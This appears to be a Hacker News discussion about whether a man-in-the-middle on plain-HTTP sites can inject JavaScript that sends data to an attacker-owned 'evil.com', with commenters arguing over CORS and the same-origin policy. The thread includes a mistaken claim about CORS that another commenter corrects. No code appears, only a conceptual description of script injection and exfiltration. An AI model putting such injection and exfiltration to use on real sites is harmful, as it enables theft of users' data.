> No, that is not allowed by the browser and will throw an error. It violates
> same origin policy. If you can figure out how to break same origin policy
> Google will pay you $5000 for reporting a significant issue to their bug
> bounty.

(I don't mean to brag, but just to point out a possibly relevant credential: I
have gotten a 4-digit bug bounty payment from Google before.)

If an attacker MITMs yoursite.com and modifies the javascript served by
yoursite.com, then when a user navigates to yoursite.com, that javascript is
allowed to connect to yoursite.com (or any domain that is served with CORS
headers). The same origin policy is about preventing a domain from accessing
domains that don't want to be accessed; it is not about preventing a domain
from talking to anyone at all including itself. (Content-Security-Policy does
focus on that, but it can be difficult to make bulletproof and should be
treated as a defense-in-depth, and it's not relevant to MITM attacks at all
since a MITM can just strip it.)

~~~
austincheney
> The attacker owns evil.com. They can make it have any headers they want, and
> then javascript on yoursite.com or any other site is allowed to make ajax
> requests to it.

Only if the page is originally requested from evil.com or if evil.com is
listed in the CORS http header from the legitimate domain.

In order for this attack to work evil.com needs to be added to the CORS list
in the http header and JavaScript needs to be inserted into the page body to
make XHR calls to the evil.com domain.

> Did you test this on HN?

I tested it on a couple of sites both with http and https. It is not a valid
vector of attack. Don't take my word for it. Try it.

\---

All these technical conversations are really a red herring based upon the
untested assumption that modification of page traffic is trivial if the page
is served over HTTP. While this is possible it isn't trivial and requires
multiple stages of compromise.

Typically, man-in-the-middle attacks refer to encrypted traffic, such as
HTTPS, rather than plain-text traffic. The benefit of a man-in-the-middle
attack is that the attacker sits in the encrypted tunnel between the two end
points, reading data that is otherwise encrypted and thereby voiding any
benefit of encryption.

Modifying traffic is less trivial than reading traffic. It is certainly less
valuable when there are security conventions in place to ensure end point
authenticity, as in limited to only locations that are available by address
and policy.

> I don't mean to brag, but just to point out a possibly relevant credential:

Don't care. I myself have found and reported a critical flaw in V8 that broke
recursive function access under certain conditions. I don't remember when the
resolution was released to V8, but it was first available to Node with 4.2.4
on 2015-12-23. All prior versions of V8 were impacted.

> If an attacker MITMs yoursite.com and modifies the javascript

And how would you do that? I have not seen anybody prove they can both MiTM a
production site and modify the data in a way that breaks same origin policy
yet everybody says its trivial. If you really want to brag and get another 4
digit bug bounty then prove that.

~~~
icebraining
_if evil.com is listed in the CORS http header from the legitimate domain._

That's not how CORS works; the header is read from the domain being called
from JavaScript, not from the domain where the JavaScript came from. So in
this case, the injected JS will call evil.com, and so the CORS headers will be
read from evil.com.

------
Qub3d
I'm going to sorta break the prime directive and link the n-gate rebuttal to
these articles: [http://archive.fo/xcQ5j](http://archive.fo/xcQ5j)

It's a bit heavy-handed, but it does bring up a good point: a lot of this
argument for HTTPS-by-default rests on assumptions about who is responsible
for data security. We're doing a lot and things are improving, but the general
public is still yelling at websites for misusing data that we willingly handed
over in the first place [0].

[0]:[https://xkcd.com/743/](https://xkcd.com/743/)

~~~
mo3gut
> assumptions about who is responsible for data security.

The chief assumption appears to be "anyone but the browser vendors". Let us
consult the article:

    
    
      BeEF
      This, to me, was the most impactful demo
    

Quite the endorsement. So what's BeEF's angle?

"...examines exploitability within the context of the one open door: the web
browser."

There could hardly be a clearer expression of contempt for the browser
vendors' offerings. But remember, the "open door" is nothing to do with them,
it's all your fault for not serving via HTTPS.

Welcome to Clown World.

~~~
pixl97
Eh, there are two execution contexts here.

1. The web browser executing the injected data stream it receives from the
remote computer.

2. Your brain interpreting 'non-executable' instructions as received from your
browser.

Browser security has nothing to do with me going to 'xyz.com', the trusted
website for xyz company, and being fed a MiTM'ed page telling me to call a
scam phone number for support.

